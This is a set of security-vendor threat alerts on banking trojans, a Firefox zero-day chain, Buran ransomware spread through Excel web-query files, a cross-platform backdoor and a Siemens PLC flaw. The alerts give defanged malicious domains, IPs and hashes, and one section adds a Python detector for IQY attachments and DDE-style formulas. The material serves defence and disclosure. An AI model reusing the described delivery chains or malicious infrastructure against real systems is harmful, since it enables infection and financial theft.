Rewterz Threat Alert – Malspam Campaigns Spreading Dridex Banking Trojan

Severity

High

Analysis Summary

Dridex, also known as Bugat and Cridex, is a form of malware that specializes in stealing bank credentials and is delivered through macros in Microsoft Word documents. Recent malspam campaigns have been observed delivering the Dridex banking malware to Windows systems. The phishing emails contain a Word or Excel attachment with embedded macros. Once the target downloads the file and enables macros, Dridex is downloaded onto the victim machine, which may lead to financial theft.
The primary objective of this malware is to steal banking information from users of infected machines in order to immediately launch fraudulent transactions. To capture that banking information, the malware installs a keyboard listener (keylogger) and performs injection attacks.

Impact

  • Theft of banking information
  • Fraudulent transactions
  • Financial loss

Indicators of Compromise

Remediation

  • Block the threat indicators at their respective controls.
  • Do not download files attached in emails coming from untrusted sources.
  • Do not enable macros for untrusted files.

Rewterz Threat Alert – McDonalds-Themed Facebook Malvertising Deploys Mispadu Banking Trojan

Severity

High

Analysis Summary

The Mispadu banking trojan is using a McDonalds malvertising tactic to ultimately steal payment-card data and online banking information. Written in Delphi, Mispadu targets Brazil and Mexico, uses pop-up windows and contains backdoor functionality.

Figure: sponsored Facebook ads offering fake McDonalds coupons

Mispadu spreads via email as well as sponsored advertisements on Facebook. These offer fake discount coupons for McDonalds, as shown above. If someone clicks the ad, they are taken to a phony McDonalds website with a button that says, “I want!/Generate coupon.” Clicking this in turn downloads a ZIP archive to the victim machine containing an MSI installer. The MSI installer sets off a chain of Visual Basic Scripts (VBS) that ultimately ends with a loader, which checks the language identifier of the target to verify that it is indeed located in Brazil or Mexico, sets up configuration files, connects to its command-and-control (C2) server and downloads the banking trojan. As for its backdoor functionality, Mispadu can take screenshots, simulate mouse and keyboard actions, and capture keystrokes. It collects fingerprinting information about its victim machines and checks whether regional security applications are installed on the target machine. It also monitors for installed banking applications, monitors the content of the clipboard, and tries to replace potential bitcoin wallet addresses with its own.

This malware extracts stored credentials from browsers (Google Chrome, Mozilla Firefox, Internet Explorer) and email clients (Microsoft Outlook, Mozilla Thunderbird, and Windows Live Mail, among others). Mispadu is an ambitious Latin American banking trojan that utilizes malvertising and extends its attack surface to web browsers. In Brazil, it was seen distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data, and that compromises the Boleto payment system. It also siphons off a list of installed common Latin American banking applications and a list of installed security products.

Impact

  • Credential Theft
  • Key logging
  • Unauthorized Remote Access
  • Theft of credit card/banking data
  • Financial loss

Indicators of Compromise

Domain Name

promoscupom[.]cf

Hostname

mcdonalds[.]promoscupom[.]cf

URL

  • http[:]//mcdonalds[.]promoscupom.cf/index1[.]html
  • http[:]//promoscupom[.]cf/
  • http[:]//3.19.223[.]147/br/mp1a
  • http[:]//mcdonalds.promoscupom[.]cf/index3.html
  • http[:]//mcdonalds.promoscupom[.]cf/index2.html

Remediation

  • Block the threat indicators at their respective controls.
  • Do not click on random advertisements even if they look appealing and harmless.
  • Keep browsers updated to latest versions and avoid using unnecessary extensions.

Rewterz Threat Alert – Active Exploitation of Firefox 0-Day Targets Cryptocurrency

Severity

High

Analysis Summary

An attack has been detected utilizing a recent Firefox zero-day and malware payloads in order to gain access to victims’ computers, networks, and sensitive information. Mozilla released an emergency Firefox update to fix a critical remote code execution vulnerability that was being actively used in targeted attacks in the wild. This bug was assigned CVE-2019-11707. While the vulnerability could be exploited for remote code execution, it would need to be chained with the sandbox escape vulnerability CVE-2019-11708 in order to affect the host operating system.

Cryptocurrency firms were the targets of attacks utilizing this exploit. The goal was most likely to gain access to corporate information, stored cryptocurrency funds, or the firms’ networks. The phishing email that allegedly initiated these attacks claimed to come from an “Adam Prize Organizer” named Neil Morris who was requesting assistance from the target. This email contained a now-defunct URL, http://people.ds.cam.ac.uk/nm603/awards/Adams_Prize. When a user visited this URL with Firefox, the exploit would drop a malicious payload on the computer. This payload, Netwire, is a Remote Access Trojan (RAT) that would allow an attacker to gain full access to the infected computer. In addition to RAT capabilities, Netwire is designed to steal information from browsers and other applications.

Impact

  • Unauthorized Access
  • Information Theft
  • Remote Code Execution
  • System Takeover
  • Financial loss

Indicators of Compromise

Domain Name

  • athlon4free2updates1[.]com
  • analyticsfit[.]com

Source IP

  • 185.49.69[.]210
  • 89.34.111[.]113

Remediation

  • Block the threat indicators at their respective controls.
  • Immediately update Firefox to a fixed version that patches the zero-day.
  • See the Rewterz advisory on CVE-2019-11707: http://www.rewterz.com/rewterz-news/rewterz-threat-advisory-cve-2019-11707-mozilla-firefox-vulnerability-exploited-in-the-wild

Rewterz Threat Alert – Buran Ransomware Infects PCs via Microsoft Excel Web Queries

Severity

High

Analysis Summary

A new spam campaign has been spotted distributing the Buran Ransomware through IQY file attachments. When opened, these Microsoft Excel Web Query attachments will execute a remote command that installs the ransomware onto a victim’s computer.

A new malspam campaign was discovered by the security researcher Suspicious Link. It pretends to be a simple forward of a previous email stating that the user should “Print document in attach”.

Malspam Email

The attached document is an IQY file that, when opened, will execute a web query, or remote command, supplied by a remote server, which uses PowerShell to install the Buran Ransomware. IQY files are Excel Web Query documents that, when opened, attempt to import data into a worksheet from external sources. For example, as shown below, the attached IQY file is simply a text file that specifies its data will come from the web and be retrieved from the listed URL.

IQY Attachment

The data returned from an external source can also be a formula that is then executed by Excel when the IQY file is opened. In this particular case, the formula launches a PowerShell command that downloads a remote Buran Ransomware executable named 1.exe, saves it to the Temp folder, and then executes it.

Remote command to execute

As with malicious macros, the user first needs to enable the data source, but as we have seen with other spam campaigns, too many people blindly click on the Enable button.

IQY File in Excel

If the user clicks Enable, the 1.exe file is downloaded and executed, and it starts encrypting the files on the computer.

Buran Encrypted Files
Buran Ransom Note
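As an added defensive example (not code from the alert or from Rewterz), the following Python parses an attachment for the IQY structure described above and reports the external data source a mail gateway or EDR rule could act on; it also checks whether text fetched from that source is a formula, as in this campaign, rather than tabular data. The sample attachment body, the fetched text and the 203.0.113.10 address are constructed.

```python
import re

# Constructed samples (not artifacts from the alert): an .iqy attachment body and
# the text an analysis sandbox retrieved from its data-source URL.
SAMPLE_IQY = "WEB\r\n1\r\nhttp://203.0.113.10/doc/1.iqy\r\n\r\nSelection=AllTables\r\nFormatting=None\r\n"
SAMPLE_RESPONSE = "=app|'constructed placeholder'!A0\r\n"

# A returned cell of the shape =program|'arguments'!cell is a formula, not data.
DDE_FORMULA_RE = re.compile(r"^\s*=\s*[A-Za-z][\w.]*\s*\|")
IP_HOST_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")


def parse_iqy(text):
    """Split an Excel Web Query file into its parts.

    The format is plain text: line 1 is the query type ("WEB"), line 2 the
    version, line 3 the URL Excel fetches, the rest optional Key=Value settings.
    Returns None when the text is not an IQY file.
    """
    lines = [ln.strip() for ln in text.splitlines()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        return None
    settings = dict(ln.split("=", 1) for ln in lines[3:] if "=" in ln)
    return {"version": lines[1], "url": lines[2], "settings": settings}


def assess_iqy(text):
    """Return findings about an attachment that a gateway rule could act on."""
    parsed = parse_iqy(text)
    if parsed is None:
        return []
    url = parsed["url"]
    host = re.sub(r"^[a-z]+://", "", url, flags=re.I).split("/", 1)[0]
    findings = ["IQY web query: Excel will contact an external data source on open",
                "data source: " + host]
    if url.lower().startswith("http://"):
        findings.append("cleartext HTTP data source")
    if IP_HOST_RE.match(host):
        findings.append("data source is a bare IP address")
    return findings


def response_is_formula(body):
    """True when fetched data is a formula Excel would evaluate rather than a table."""
    first = body.splitlines()[0] if body.strip() else ""
    return bool(DDE_FORMULA_RE.match(first))
```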

Impact

File encryption

Remediation

  • Always be suspicious about emails sent by unknown senders.
  • Never click on the links/attachments sent by unknown senders.
  • Users can also block IQY files in Excel.

Rewterz Threat Alert – A New Multiplatform Backdoor Targeting Linux

Severity

Medium

Analysis Summary

A new multiplatform backdoor targeting Linux has been identified; it does not have any known connections to other threat groups.

Technical Analysis

The Linux binary is a statically linked ELF file, while the Windows binary is a dynamically linked PE file.

Both instances of this malware are practically identical in terms of overall functionality, with minor implementation differences. However, if we pay close attention to each instance we can draw some conclusions regarding the nature of the authors.

Both malware instances share the same protocol to communicate with the same C2 server. However, these instances have different delivery vectors.

Backdoor Analysis

The Windows variant of this malware does not represent a complex threat in terms of Windows malware. Conversely, the Linux variant shows more sophistication in regards to the implementation details used to replicate the same functionality.

This indicates information regarding the malware authors’ development environment preference.

The main function is not obfuscated and appears straightforward in logic. In the Windows variant we can see how some strings are decoded at the beginning of the function.

Impact

  • Arbitrary execution of shell commands
  • Arbitrary binary execution

Indicators of Compromise

IP

  • 185[.]198[.]56[.]53
  • 193[.]29[.]15[.]147

SHA-256

  • 5d51dbf649d34cd6927efdb6ef082f27a6ccb25a92e892800c583a881bbf9415
  • 907e1dfde652b17338d307b6a13a5af7a8f6ced93a7a71f7f65d40123b93f2b8

Remediation

  • Block all threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the links/attachments sent by unknown senders.

Rewterz Threat Advisory – CVE-2019-13945 – ICS: Undocumented access feature in Siemens SIMATIC PLCs Code Execution Vulnerability

Severity

Medium

Analysis Summary

There is an access mode, used during manufacturing of S7-1200 CPUs, that allows additional diagnostic functionality. Using this functionality requires physical access to the UART interface during the boot process.

Impact

Arbitrary code execution

Affected Vendors

Siemens

Affected Products

SIMATIC S7-1200: all versions

Remediation

Apply defense in depth, following Siemens’ operational guidelines for industrial security:

https://assets.new.siemens.com/siemens/assets/api/uuid:411e91564a2d259ecd4b6c79b51f89c044b3de81/operational-guidelines-industrial-security-en.pdf


Copyright © Rewterz. All rights reserved.